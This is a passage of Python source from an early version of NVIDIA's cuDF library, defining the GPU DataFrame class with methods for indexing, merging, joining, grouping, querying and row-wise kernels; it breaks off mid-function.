] | null | null | null | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
] | 1 | 2019-08-13T17:19:45.000Z | 2019-08-13T17:19:45.000Z | # Copyright (c) 2018, NVIDIA CORPORATION.
from __future__ import print_function, division
import inspect
import random
from collections import OrderedDict
import warnings
import numpy as np
import pandas as pd
import pyarrow as pa
from numba.cuda.cudadrv.devicearray import DeviceNDArray
from librmm_cffi import librmm as rmm
from cudf import formatting, _gdf
from cudf.utils import cudautils, queryutils, applyutils, utils
from .index import GenericIndex, Index, RangeIndex
from .series import Series
from .column import Column
from cudf.settings import NOTSET, settings
from cudf.comm.serialize import register_distributed_serializer
from .categorical import CategoricalColumn
from .datetime import DatetimeColumn
from .numerical import NumericalColumn
from .buffer import Buffer
from cudf._gdf import nvtx_range_push, nvtx_range_pop
import cudf.bindings.join as cpp_join
class DataFrame(object):
"""
A GPU Dataframe object.
Examples
--------
Build dataframe with `__setitem__`:
.. code-block:: python
from cudf.dataframe import DataFrame
df = DataFrame()
df['key'] = [0, 1, 2, 3, 4]
df['val'] = [float(i + 10) for i in range(5)] # insert column
print(df)
Output:
.. code-block:: python
key val
0 0 10.0
1 1 11.0
2 2 12.0
3 3 13.0
4 4 14.0
Build dataframe with initializer:
.. code-block:: python
from cudf.dataframe import DataFrame
import numpy as np
import datetime as dt
ids = np.arange(5)
# Create some datetime data
t0 = dt.datetime.strptime('2018-10-07 12:00:00', '%Y-%m-%d %H:%M:%S')
datetimes = [(t0+ dt.timedelta(seconds=x)) for x in range(5)]
dts = np.array(datetimes, dtype='datetime64')
# Create the GPU DataFrame
df = DataFrame([('id', ids), ('datetimes', dts)])
print(df)
Output:
.. code-block:: python
id datetimes
0 0 2018-10-07T12:00:00.000
1 1 2018-10-07T12:00:01.000
2 2 2018-10-07T12:00:02.000
3 3 2018-10-07T12:00:03.000
4 4 2018-10-07T12:00:04.000
Convert from a Pandas DataFrame:
.. code-block:: python
import pandas as pd
from pygdf.dataframe import DataFrame
pdf = pd.DataFrame({'a': [0, 1, 2, 3],'b': [0.1, 0.2, None, 0.3]})
df = DataFrame.from_pandas(pdf)
print(df)
Output:
.. code-block:: python
a b
0 0 0.1
1 1 0.2
2 2 nan
3 3 0.3
"""
def __init__(self, name_series=None, index=None):
if index is None:
index = RangeIndex(start=0)
self._index = index
self._size = len(index)
self._cols = OrderedDict()
# has initializer?
if name_series is not None:
if isinstance(name_series, dict):
name_series = name_series.items()
for k, series in name_series:
self.add_column(k, series, forceindex=index is not None)
def serialize(self, serialize):
header = {}
frames = []
header['index'], index_frames = serialize(self._index)
header['index_frame_count'] = len(index_frames)
frames.extend(index_frames)
# Use the column directly to avoid duplicating the index
columns = [col._column for col in self._cols.values()]
serialized_columns = zip(*map(serialize, columns))
header['columns'], column_frames = serialized_columns
header['column_names'] = tuple(self._cols)
for f in column_frames:
frames.extend(f)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
# Reconstruct the index
index_header = header['index']
index_frames = frames[:header['index_frame_count']]
index = deserialize(index_header, index_frames)
# Reconstruct the columns
column_frames = frames[header['index_frame_count']:]
columns = []
for k, meta in zip(header['column_names'], header['columns']):
col_frame_count = meta['frame_count']
colobj = deserialize(meta, column_frames[:col_frame_count])
columns.append((k, colobj))
# Advance frames
column_frames = column_frames[col_frame_count:]
return cls(columns, index=index)
@property
def dtypes(self):
"""Return the dtypes in this object."""
return pd.Series([x.dtype for x in self._cols.values()],
index=self._cols.keys())
@property
def shape(self):
"""Returns a tuple representing the dimensionality of the DataFrame.
"""
return len(self), len(self._cols)
def __dir__(self):
o = set(dir(type(self)))
o.update(self.__dict__)
o.update(c for c in self.columns if
(isinstance(c, pd.compat.string_types) and
pd.compat.isidentifier(c)))
return list(o)
def __getattr__(self, key):
if key != '_cols' and key in self._cols:
return self[key]
raise AttributeError("'DataFrame' object has no attribute %r" % key)
def __getitem__(self, arg):
"""
If *arg* is a ``str``, return the column Series.
If *arg* is a ``slice``, return a new DataFrame with all columns
sliced to the specified range.
If *arg* is an ``array`` containing column names, return a new
DataFrame with the corresponding columns.
Examples
--------
>>> df = DataFrame([('a', list(range(20))),
... ('b', list(range(20))),
... ('c', list(range(20)))])
>>> df[:4] # get first 4 rows of all columns
a b c
0 0 0 0
1 1 1 1
2 2 2 2
3 3 3 3
>>> df[-5:] # get last 5 rows of all columns
a b c
15 15 15 15
16 16 16 16
17 17 17 17
18 18 18 18
19 19 19 19
>>>df[['a','c']] # get columns a and c
a c
0 0 0
1 1 1
2 2 2
3 3 3
"""
if isinstance(arg, str) or isinstance(arg, int):
s = self._cols[arg]
s.name = arg
return s
elif isinstance(arg, slice):
df = DataFrame()
for k, col in self._cols.items():
df[k] = col[arg]
return df
elif isinstance(arg, (list,)):
df = DataFrame()
for col in arg:
df[col] = self[col]
return df
else:
msg = "__getitem__ on type {!r} is not supported"
raise TypeError(msg.format(arg))
def __setitem__(self, name, col):
"""Add/set column by *name*
"""
if name in self._cols:
self._cols[name] = self._prepare_series_for_add(col)
else:
self.add_column(name, col)
def __delitem__(self, name):
"""
Drop the given column by *name*.
"""
self.drop_column(name)
def __sizeof__(self):
return sum(col.__sizeof__() for col in self._cols.values())
def __len__(self):
"""
Returns the number of rows
"""
return self._size
def assign(self, **kwargs):
"""
Assign columns to DataFrame from keyword arguments.
Examples
--------
.. code-block:: python
import cudf
df = cudf.dataframe.DataFrame()
df = df.assign(a=[0,1,2], b=[3,4,5])
print(df)
Output:
.. code-block:: python
a b
0 0 3
1 1 4
2 2 5
"""
new = self.copy()
for k, v in kwargs.items():
new[k] = v
return new
def head(self, n=5):
"""
Returns the first n rows as a new DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
df = DataFrame()
df['key'] = [0, 1, 2, 3, 4]
df['val'] = [float(i + 10) for i in range(5)] # insert column
print(df.head(2))
Output
.. code-block:: python
key val
0 0 10.0
1 1 11.0
"""
return self[:n]
def to_string(self, nrows=NOTSET, ncols=NOTSET):
"""
Convert to string
Parameters
----------
nrows : int
Maximum number of rows to show.
If it is None, all rows are shown.
ncols : int
Maximum number of columns to show.
If it is None, all columns are shown.
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame()
df = DataFrame()
df['key'] = [0, 1, 2]
df['val'] = [float(i + 10) for i in range(3)]
df.to_string()
Output:
.. code-block:: python
' key val\\n0 0 10.0\\n1 1 11.0\\n2 2 12.0'
"""
if nrows is NOTSET:
nrows = settings.formatting.get('nrows')
if ncols is NOTSET:
ncols = settings.formatting.get('ncols')
if nrows is None:
nrows = len(self)
else:
nrows = min(nrows, len(self)) # cap row count
if ncols is None:
ncols = len(self.columns)
else:
ncols = min(ncols, len(self.columns)) # cap col count
more_cols = len(self.columns) - ncols
more_rows = len(self) - nrows
# Prepare cells
cols = OrderedDict()
use_cols = list(self.columns[:ncols - 1])
if ncols > 0:
use_cols.append(self.columns[-1])
for h in use_cols:
cols[h] = self[h].values_to_string(nrows=nrows)
# Format into a table
return formatting.format(index=self._index, cols=cols,
show_headers=True, more_cols=more_cols,
more_rows=more_rows)
def __str__(self):
nrows = settings.formatting.get('nrows') or 10
ncols = settings.formatting.get('ncols') or 8
return self.to_string(nrows=nrows, ncols=ncols)
def __repr__(self):
return "<cudf.DataFrame ncols={} nrows={} >".format(
len(self.columns),
len(self),
)
@property
def loc(self):
"""
Returns a label-based indexer for row-slicing and column selection.
Examples
--------
>>> df = DataFrame([('a', list(range(20))),
... ('b', list(range(20))),
... ('c', list(range(20)))])
# get rows from index 2 to index 5 from 'a' and 'b' columns.
>>> df.loc[2:5, ['a', 'b']]
a b
2 2 2
3 3 3
4 4 4
5 5 5
"""
return Loc(self)
@property
def columns(self):
"""Returns a tuple of columns
"""
return pd.Index(self._cols)
@property
def index(self):
"""Returns the index of the DataFrame
"""
return self._index
def set_index(self, index):
"""Return a new DataFrame with a new index
Parameters
----------
index : Index, Series-convertible, or str
Index : the new index.
Series-convertible : values for the new index.
str : name of column to be used as series
"""
# When index is a column name
if isinstance(index, str):
df = self.copy()
df.drop_column(index)
return df.set_index(self[index])
# Otherwise
else:
index = index if isinstance(index, Index) else GenericIndex(index)
df = DataFrame()
for k in self.columns:
df[k] = self[k].set_index(index)
return df
def reset_index(self):
return self.set_index(RangeIndex(len(self)))
def take(self, positions, ignore_index=False):
out = DataFrame()
for col in self.columns:
out[col] = self[col].take(positions, ignore_index=ignore_index)
return out
def copy(self):
"""
Returns a copy of this dataframe
"""
df = DataFrame()
df._index = self._index
df._size = self._size
df._cols = self._cols.copy()
return df
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo={}):
"""
Parameters
----------
memo, default None
Standard signature. Unused
"""
if memo is None:
memo = {}
return self.copy()
def _sanitize_columns(self, col):
"""Sanitize pre-appended
col values
"""
series = Series(col)
if len(self) == 0 and len(self.columns) > 0 and len(series) > 0:
ind = series.index
arr = rmm.device_array(shape=len(ind), dtype=np.float64)
size = utils.calc_chunk_size(arr.size, utils.mask_bitsize)
mask = cudautils.zeros(size, dtype=utils.mask_dtype)
val = Series.from_masked_array(arr, mask, null_count=len(ind))
for name in self._cols:
self._cols[name] = val
self._index = series.index
self._size = len(series)
def _sanitize_values(self, col):
"""Sanitize col values before
being added
"""
index = self._index
series = Series(col)
sind = series.index
VALID = isinstance(col, (np.ndarray, DeviceNDArray, list, Series,
Column))
if len(self) > 0 and len(series) == 1 and not VALID:
arr = rmm.device_array(shape=len(index), dtype=series.dtype)
cudautils.gpu_fill_value.forall(arr.size)(arr, col)
return Series(arr)
elif len(self) > 0 and len(sind) != len(index):
raise ValueError('Length of values does not match index length')
return col
def _prepare_series_for_add(self, col, forceindex=False):
"""Prepare a series to be added to the DataFrame.
Parameters
----------
col : Series, array-like
Values to be added.
Returns
-------
The prepared Series object.
"""
self._sanitize_columns(col)
col = self._sanitize_values(col)
empty_index = len(self._index) == 0
series = Series(col)
if forceindex or empty_index or self._index == series.index:
if empty_index:
self._index = series.index
self._size = len(series)
return series
else:
return series.set_index(self._index)
def add_column(self, name, data, forceindex=False):
"""Add a column
Parameters
----------
name : str
Name of column to be added.
data : Series, array-like
Values to be added.
"""
if name in self._cols:
raise NameError('duplicated column name {!r}'.format(name))
series = self._prepare_series_for_add(data, forceindex=forceindex)
series.name = name
self._cols[name] = series
def drop_column(self, name):
"""Drop a column by *name*
"""
if name not in self._cols:
raise NameError('column {!r} does not exist'.format(name))
del self._cols[name]
@classmethod
def _concat(cls, objs, ignore_index=False):
nvtx_range_push("PYGDF_CONCAT", "orange")
if len(set(frozenset(o.columns) for o in objs)) != 1:
what = set(frozenset(o.columns) for o in objs)
raise ValueError('columns mismatch: {}'.format(what))
objs = [o for o in objs]
if ignore_index:
index = RangeIndex(sum(map(len, objs)))
else:
index = Index._concat([o.index for o in objs])
data = [(c, Series._concat([o[c] for o in objs], index=index))
for c in objs[0].columns]
out = cls(data)
out._index = index
nvtx_range_pop()
return out
def as_gpu_matrix(self, columns=None, order='F'):
"""Convert to a matrix in device memory.
Parameters
----------
columns : sequence of str
List of a column names to be extracted. The order is preserved.
If None is specified, all columns are used.
order : 'F' or 'C'
Optional argument to determine whether to return a column major
(Fortran) matrix or a row major (C) matrix.
Returns
-------
A (nrow x ncol) numpy ndarray in "F" order.
"""
if columns is None:
columns = self.columns
cols = [self._cols[k] for k in columns]
ncol = len(cols)
nrow = len(self)
if ncol < 1:
raise ValueError("require at least 1 column")
if nrow < 1:
raise ValueError("require at least 1 row")
dtype = cols[0].dtype
if any(dtype != c.dtype for c in cols):
raise ValueError('all columns must have the same dtype')
for k, c in self._cols.items():
if c.null_count > 0:
errmsg = ("column {!r} has null values. "
"hint: use .fillna() to replace null values")
raise ValueError(errmsg.format(k))
if order == 'F':
matrix = rmm.device_array(shape=(nrow, ncol), dtype=dtype,
order=order)
for colidx, inpcol in enumerate(cols):
dense = inpcol.to_gpu_array(fillna='pandas')
matrix[:, colidx].copy_to_device(dense)
elif order == 'C':
matrix = cudautils.row_matrix(cols, nrow, ncol, dtype)
else:
errmsg = ("order parameter should be 'C' for row major or 'F' for"
"column major GPU matrix")
raise ValueError(errmsg.format(k))
return matrix
def as_matrix(self, columns=None):
"""Convert to a matrix in host memory.
Parameters
----------
columns : sequence of str
List of a column names to be extracted. The order is preserved.
If None is specified, all columns are used.
Returns
-------
A (nrow x ncol) numpy ndarray in "F" order.
"""
return self.as_gpu_matrix(columns=columns).copy_to_host()
def one_hot_encoding(self, column, prefix, cats, prefix_sep='_',
dtype='float64'):
"""
Expand a column with one-hot-encoding.
Parameters
----------
column : str
the source column with binary encoding for the data.
prefix : str
the new column name prefix.
cats : sequence of ints
the sequence of categories as integers.
prefix_sep : str
the separator between the prefix and the category.
dtype :
the dtype for the outputs; defaults to float64.
Returns
-------
a new dataframe with new columns append for each category.
Examples
--------
.. code-block:: python
import pandas as pd
from cudf.dataframe import DataFrame as gdf
pet_owner = [1, 2, 3, 4, 5]
pet_type = ['fish', 'dog', 'fish', 'bird', 'fish']
df = pd.DataFrame({'pet_owner': pet_owner, 'pet_type': pet_type})
df.pet_type = df.pet_type.astype('category')
# Create a column with numerically encoded category values
df['pet_codes'] = df.pet_type.cat.codes
my_gdf = gdf.from_pandas(df)
# Create the list of category codes to use in the encoding
codes = my_gdf.pet_codes.unique()
enc_gdf = my_gdf.one_hot_encoding('pet_codes', 'pet_dummy', codes)
enc_gdf.head()
Output:
.. code-block:: python
pet_owner pet_type pet_codes pet_dummy_0 pet_dummy_1 pet_dummy_2
0 1 fish 2 0.0 0.0 1.0
1 2 dog 1 0.0 1.0 0.0
2 3 fish 2 0.0 0.0 1.0
3 4 bird 0 1.0 0.0 0.0
4 5 fish 2 0.0 0.0 1.0
"""
newnames = [prefix_sep.join([prefix, str(cat)]) for cat in cats]
newcols = self[column].one_hot_encoding(cats=cats, dtype=dtype)
outdf = self.copy()
for name, col in zip(newnames, newcols):
outdf.add_column(name, col)
return outdf
def label_encoding(self, column, prefix, cats, prefix_sep='_', dtype=None,
na_sentinel=-1):
"""Encode labels in a column with label encoding.
Parameters
----------
column : str
the source column with binary encoding for the data.
prefix : str
the new column name prefix.
cats : sequence of ints
the sequence of categories as integers.
prefix_sep : str
the separator between the prefix and the category.
dtype :
the dtype for the outputs; see Series.label_encoding
na_sentinel : number
Value to indicate missing category.
Returns
-------
a new dataframe with a new column append for the coded values.
"""
newname = prefix_sep.join([prefix, 'labels'])
newcol = self[column].label_encoding(cats=cats, dtype=dtype,
na_sentinel=na_sentinel)
outdf = self.copy()
outdf.add_column(newname, newcol)
return outdf
def _sort_by(self, sorted_indices):
df = DataFrame()
# Perform out = data[index] for all columns
for k in self.columns:
df[k] = self[k].take(sorted_indices.to_gpu_array())
return df
def sort_index(self, ascending=True):
"""Sort by the index
"""
return self._sort_by(self.index.argsort(ascending=ascending))
def sort_values(self, by, ascending=True):
"""
Uses parallel radixsort, which is a stable sort.
Parameters
----------
by : str
Name of Series to sort by
ascending : bool, default True
Sort ascending vs. descending.
Returns
-------
sorted_obj : cuDF DataFrame
Difference from pandas:
* *by* must be the name of a single column.
* Support axis='index' only. by : str
* Not supporting: inplace, kind, na_position
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
df.sort_values('b')
Output:
.. code-block:: python
a b
0 0 -3
2 2 0
1 1 2
"""
# argsort the `by` column
return self._sort_by(self[by].argsort(ascending=ascending))
def nlargest(self, n, columns, keep='first'):
"""Get the rows of the DataFrame sorted by the n largest value of *columns*
Difference from pandas:
* Only a single column is supported in *columns*
"""
return self._n_largest_or_smallest('nlargest', n, columns, keep)
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of the DataFrame sorted by the n smallest value of *columns*
Difference from pandas:
* Only a single column is supported in *columns*
"""
return self._n_largest_or_smallest('nsmallest', n, columns, keep)
def _n_largest_or_smallest(self, method, n, columns, keep):
# Get column to operate on
if not isinstance(columns, str):
[column] = columns
else:
column = columns
if not (0 <= n < len(self)):
raise ValueError("n out-of-bound")
col = self[column].reset_index()
# Operate
sorted_series = getattr(col, method)(n=n, keep=keep)
df = DataFrame()
new_positions = sorted_series.index.gpu_values
for k in self.columns:
if k == column:
df[k] = sorted_series
else:
df[k] = self[k].reset_index().take(new_positions)
return df.set_index(self.index.take(new_positions))
def merge(self, other, on=None, how='left', lsuffix='_x', rsuffix='_y',
type="", method='hash'):
"""Merge GPU DataFrame objects by performing a database-style join operation
by columns or indexes.
Parameters
----------
other : DataFrame
on : label or list; defaults to None
Column or index level names to join on. These must be found in
both DataFrames.
If on is None and not merging on indexes then
this defaults to the intersection of the columns
in both DataFrames.
how : str, defaults to 'left'
Only accepts 'left'
left: use only keys from left frame, similar to
a SQL left outer join; preserve key order
lsuffix : str, defaults to '_x'
Suffix applied to overlapping column names on the left side
rsuffix : str, defaults to '_y'
Suffix applied to overlapping column names on the right side
type : str, defaults to 'hash'
Returns
-------
merged : DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
df_a = DataFrame()
df['key'] = [0, 1, 2, 3, 4]
df['vals_a'] = [float(i + 10) for i in range(5)]
df_b = DataFrame()
df_b['key'] = [1, 2, 4]
df_b['vals_b'] = [float(i+10) for i in range(3)]
df_merged = df_a.merge(df_b, on=['key'], how='left')
print(df_merged.sort_values('key'))
Output:
.. code-block:: python
key val vals_b
3 0 10.0
0 1 11.0 10.0
1 2 12.0 11.0
4 3 13.0
2 4 14.0 12.0
"""
_gdf.nvtx_range_push("PYGDF_JOIN", "blue")
if type != "":
warnings.warn(
'type="' + type + '" parameter is deprecated.'
'Use method="' + type + '" instead.',
DeprecationWarning
)
method = type
if how not in ['left', 'inner', 'outer']:
raise NotImplementedError('{!r} merge not supported yet'
.format(how))
same_names = set(self.columns) & set(other.columns)
if same_names and not (lsuffix or rsuffix):
raise ValueError('there are overlapping columns but '
'lsuffix and rsuffix are not defined')
def fix_name(name, suffix):
if name in same_names:
return "{}{}".format(name, suffix)
return name
lhs = self
rhs = other
col_cats = {}
for name in on:
if pd.api.types.is_categorical_dtype(self[name]):
lcats = self[name].cat.categories
rcats = other[name].cat.categories
if how == 'left':
cats = lcats
other[name] = (other[name].cat.set_categories(cats)
.fillna(-1))
elif how == 'right':
cats = rcats
self[name] = (self[name].cat.set_categories(cats)
.fillna(-1))
elif how in ['inner', 'outer']:
# Do the join using the union of categories from both side.
# Adjust for inner joins afterwards
cats = sorted(set(lcats) | set(rcats))
self[name] = (self[name].cat.set_categories(cats)
.fillna(-1))
self[name] = self[name]._column.as_numerical
other[name] = (other[name].cat.set_categories(cats)
.fillna(-1))
other[name] = other[name]._column.as_numerical
col_cats[name] = cats
for name, col in lhs._cols.items():
if pd.api.types.is_categorical_dtype(col) and name not in on:
f_n = fix_name(name, lsuffix)
col_cats[f_n] = self[name].cat.categories
for name, col in rhs._cols.items():
if pd.api.types.is_categorical_dtype(col) and name not in on:
f_n = fix_name(name, rsuffix)
col_cats[f_n] = other[name].cat.categories
cols, valids = cpp_join.join(lhs._cols, rhs._cols, on, how,
method=method)
df = DataFrame()
# Columns are returned in order left - on - right from libgdf
# Creating dataframe with ordering as pandas:
gap = len(self.columns) - len(on)
for idx in range(len(on)):
if (cols[idx + gap].dtype == 'datetime64[ms]'):
df[on[idx]] = DatetimeColumn(data=Buffer(cols[idx + gap]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif on[idx] in col_cats.keys():
df[on[idx]] = CategoricalColumn(data=Buffer(cols[idx + gap]),
categories=col_cats[on[idx]],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[on[idx]] = NumericalColumn(data=Buffer(cols[idx + gap]),
dtype=cols[idx + gap].dtype,
mask=Buffer(valids[idx]))
idx = 0
for name in self.columns:
if name not in on:
f_n = fix_name(name, lsuffix)
if (cols[idx].dtype == 'datetime64[ms]'):
df[f_n] = DatetimeColumn(data=Buffer(cols[idx]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif f_n in col_cats.keys():
df[f_n] = CategoricalColumn(data=Buffer(cols[idx]),
categories=col_cats[f_n],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[f_n] = NumericalColumn(data=Buffer(cols[idx]),
dtype=cols[idx].dtype,
mask=Buffer(valids[idx]))
idx = idx + 1
idx = len(self.columns)
for name in other.columns:
if name not in on:
f_n = fix_name(name, rsuffix)
if (cols[idx].dtype == 'datetime64[ms]'):
df[f_n] = DatetimeColumn(data=Buffer(cols[idx]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif f_n in col_cats.keys():
df[f_n] = CategoricalColumn(data=Buffer(cols[idx]),
categories=col_cats[f_n],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[f_n] = NumericalColumn(data=Buffer(cols[idx]),
dtype=cols[idx].dtype,
mask=Buffer(valids[idx]))
idx = idx + 1
_gdf.nvtx_range_pop()
return df
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False, type="", method='hash'):
"""Join columns with other DataFrame on index or on a key column.
Parameters
----------
other : DataFrame
how : str
Only accepts "left", "right", "inner", "outer"
lsuffix, rsuffix : str
The suffices to add to the left (*lsuffix*) and right (*rsuffix*)
column names when avoiding conflicts.
sort : bool
Set to True to ensure sorted ordering.
Returns
-------
joined : DataFrame
Notes
-----
Difference from pandas:
- *other* must be a single DataFrame for now.
- *on* is not supported yet due to lack of multi-index support.
"""
_gdf.nvtx_range_push("PYGDF_JOIN", "blue")
# Outer joins still use the old implementation
if type != "":
warnings.warn(
'type="' + type + '" parameter is deprecated.'
'Use method="' + type + '" instead.',
DeprecationWarning
)
method = type
if how not in ['left', 'right', 'inner', 'outer']:
raise NotImplementedError('unsupported {!r} join'.format(how))
if how == 'right':
# libgdf doesn't support right join directly, we will swap the
# dfs and use left join
return other.join(self, other, how='left', lsuffix=rsuffix,
rsuffix=lsuffix, sort=sort, method='hash')
same_names = set(self.columns) & set(other.columns)
if same_names and not (lsuffix or rsuffix):
raise ValueError('there are overlapping columns but '
'lsuffix and rsuffix are not defined')
lhs = DataFrame()
rhs = DataFrame()
# Creating unique column name to use libgdf join
idx_col_name = str(random.randint(2**29, 2**31))
while idx_col_name in self.columns or idx_col_name in other.columns:
idx_col_name = str(random.randint(2**29, 2**31))
lhs[idx_col_name] = Series(self.index.as_column()).set_index(self
.index)
rhs[idx_col_name] = Series(other.index.as_column()).set_index(other
.index)
for name in self.columns:
lhs[name] = self[name]
for name in other.columns:
rhs[name] = other[name]
lhs = lhs.reset_index()
rhs = rhs.reset_index()
cat_join = False
if pd.api.types.is_categorical_dtype(lhs[idx_col_name]):
cat_join = True
lcats = lhs[idx_col_name].cat.categories
rcats = rhs[idx_col_name].cat.categories
if how == 'left':
cats = lcats
rhs[idx_col_name] = (rhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
elif how == 'right':
cats = rcats
lhs[idx_col_name] = (lhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
elif how in ['inner', 'outer']:
cats = sorted(set(lcats) | set(rcats))
lhs[idx_col_name] = (lhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
lhs[idx_col_name] = lhs[idx_col_name]._column.as_numerical
rhs[idx_col_name] = (rhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
rhs[idx_col_name] = rhs[idx_col_name]._column.as_numerical
print(cats)
print(lhs[idx_col_name])
print(rhs[idx_col_name])
if lsuffix == '':
lsuffix = 'l'
if rsuffix == '':
rsuffix = 'r'
df = lhs.merge(rhs, on=[idx_col_name], how=how, lsuffix=lsuffix,
rsuffix=rsuffix, method=method)
if cat_join:
df[idx_col_name] = CategoricalColumn(data=df[idx_col_name].data,
categories=cats,
ordered=False)
df = df.set_index(idx_col_name)
if sort and len(df):
return df.sort_index()
return df
def groupby(self, by, sort=False, as_index=False, method="sort"):
"""Groupby
Parameters
----------
by : list-of-str or str
Column name(s) to form that groups by.
sort : bool
Force sorting group keys.
Depends on the underlying algorithm.
as_index : bool; defaults to False
Must be False. Provided to be API compatible with pandas.
The keys are always left as regular columns in the result.
method : str, optional
A string indicating the method to use to perform the group by.
Valid values are "sort", "hash", or "cudf".
"cudf" method may be deprecated in the future, but is currently
the only method supporting group UDFs via the `apply` function.
Returns
-------
The groupby object
Notes
-----
Unlike pandas, this groupby operation behaves like a SQL groupby.
No empty rows are returned. (For categorical keys, pandas returns
rows for all categories even if they are no corresponding values.)
Only a minimal number of operations is implemented so far.
- Only *by* argument is supported.
- Since we don't support multiindex, the *by* columns are stored
as regular columns.
"""
if (method == "cudf"):
from cudf.groupby.legacy_groupby import Groupby
if as_index:
msg = "as_index==True not supported due to the lack of\
multi-index"
raise NotImplementedError(msg)
result = Groupby(self, by=by)
return result
else:
from cudf.groupby.groupby import Groupby
_gdf.nvtx_range_push("PYGDF_GROUPBY", "purple")
if as_index:
msg = "as_index==True not supported due to the lack of\
multi-index"
raise NotImplementedError(msg)
# The matching `pop` for this range is inside LibGdfGroupby
# __apply_agg
result = Groupby(self, by=by, method=method)
return result
def query(self, expr):
"""
Query with a boolean expression using Numba to compile a GPU kernel.
See pandas.DataFrame.query.
Parameters
----------
expr : str
A boolean expression. Names in expression refer to columns.
Names starting with `@` refer to Python variables
Returns
-------
filtered : DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [1, 2, 2])
b = ('b', [3, 4, 5])
df = DataFrame([a, b])
expr = "(a == 2 and b == 4) or (b == 3)"
df.query(expr)
Output:
.. code-block:: python
a b
0 1 3
1 2 4
DateTime conditionals:
.. code-block:: python
from cudf.dataframe import DataFrame
import numpy as np
df = DataFrame()
data = np.array(['2018-10-07', '2018-10-08'], dtype='datetime64')
df['datetimes'] = data
search_date = dt.datetime.strptime('2018-10-08', '%Y-%m-%d')
df.query('datetimes==@search_date')
Output:
.. code-block:: python
datetimes
1 2018-10-08T00:00:00.000
"""
_gdf.nvtx_range_push("PYGDF_QUERY", "purple")
# Get calling environment
callframe = inspect.currentframe().f_back
callenv = {
'locals': callframe.f_locals,
'globals': callframe.f_globals,
}
# Run query
boolmask = queryutils.query_execute(self, expr, callenv)
selected = Series(boolmask)
newdf = DataFrame()
for col in self.columns:
newseries = self[col][selected]
newdf[col] = newseries
result = newdf
_gdf.nvtx_range_pop()
return result
@applyutils.doc_apply()
def apply_rows(self, func, incols, outcols, kwargs, cache_key=None):
"""
Apply a row-wise user defined function.
Parameters
----------
{params}
Examples
--------
The user function should loop over the columns and set the output for
each row. Loop execution order is arbitrary, so each iteration of
the loop **MUST** be independent of each other.
When ``func`` is invoked, the array args corresponding to the
input/output are strided so as to improve GPU parallelism.
The loop in the function resembles serial code, but executes
concurrently in multiple threads.
.. code-block:: python
import cudf
import numpy as np
df = cudf.dataframe.DataFrame()
nelem = 3
df['in1'] = np.arange(nelem)
df['in2'] = np.arange(nelem)
df['in3'] = np.arange(nelem)
# Define input columns for the kernel
in1 = df['in1']
in2 = df['in2']
in3 = df['in3']
def kernel(in1, in2, in3, out1, out2, kwarg1, kwarg2):
for i, (x, y, z) in enumerate(zip(in1, in2, in3)):
out1[i] = kwarg2 * x - kwarg1 * y
out2[i] = y - kwarg1 * z
Call ``.apply_rows`` with the name of the input columns, the name and
dtype of the output columns, and, optionally, a dict of extra
arguments.
.. code-block:: python
df.apply_rows(kernel,
incols=['in1', 'in2', 'in3'],
outcols=dict(out1=np.float64, out2=np.float64),
kwargs=dict(kwarg1=3, kwarg2=4))
Output:
.. code-block:: python
in1 in2 in3 out1 out2
0 0 0 0 0.0 0.0
1 1 1 1 1.0 -2.0
2 2 2 2 2.0 -4.0
"""
return applyutils.apply_rows(self, func, incols, outcols, kwargs,
cache_key=cache_key)
@applyutils.doc_applychunks()
def apply_chunks(self, func, incols, outcols, kwargs={}, chunks=None,
tpb=1):
"""
Transform user-specified chunks using the user-provided function.
Parameters
----------
{params}
{params_chunks}
Examples
--------
For ``tpb > 1``, ``func`` is executed by ``tpb`` number of threads
concurrently. To access the thread id and count,
use ``numba.cuda.threadIdx.x`` and ``numba.cuda.blockDim.x``,
respectively (See `numba CUDA kernel documentation`_).
.. _numba CUDA kernel documentation:\
http://numba.pydata.org/numba-doc/latest/cuda/kernels.html
In the example below, the *kernel* is invoked concurrently on each
specified chunk. The *kernel* computes the corresponding output
for the chunk.
By looping over the range
``range(cuda.threadIdx.x, in1.size, cuda.blockDim.x)``, the *kernel*
function can be used with any *tpb* in a efficient manner.
.. code-block:: python
from numba import cuda
def kernel(in1, in2, in3, out1):
for i in range(cuda.threadIdx.x, in1.size, cuda.blockDim.x):
x = in1[i]
y = in2[i]
z = in3[i]
out1[i] = x * y + z
See also
--------
.apply_rows
"""
if chunks is None:
raise ValueError('*chunks* must be defined')
return applyutils.apply_chunks(self, func, incols, outcols, kwargs,
chunks=chunks, tpb=tpb)
def hash_columns(self, columns=None):
"""Hash the given *columns* and return a new Series
Parameters
----------
column : sequence of str; optional
Sequence of column names. If columns is *None* (unspecified),
all columns in the frame are used.
"""
from . import numerical
if columns is None:
columns = self.columns
cols = [self[k]._column for k in columns]
return Series(numerical.column_hash_values(*cols))
def partition_by_hash(self, columns, nparts):
"""Partition the dataframe by the hashed value of data in *columns*.
Parameters
----------
columns : sequence of str
The names of the columns to be hashed.
Must have at least one name.
nparts : int
Number of output partitions
Returns
-------
partitioned: list of DataFrame
"""
cols = [col._column for col in self._cols.values()]
names = list(self._cols.keys())
key_indices = [names.index(k) for k in columns]
# Allocate output buffers
outputs = [col.copy() for col in cols]
# Call hash_partition
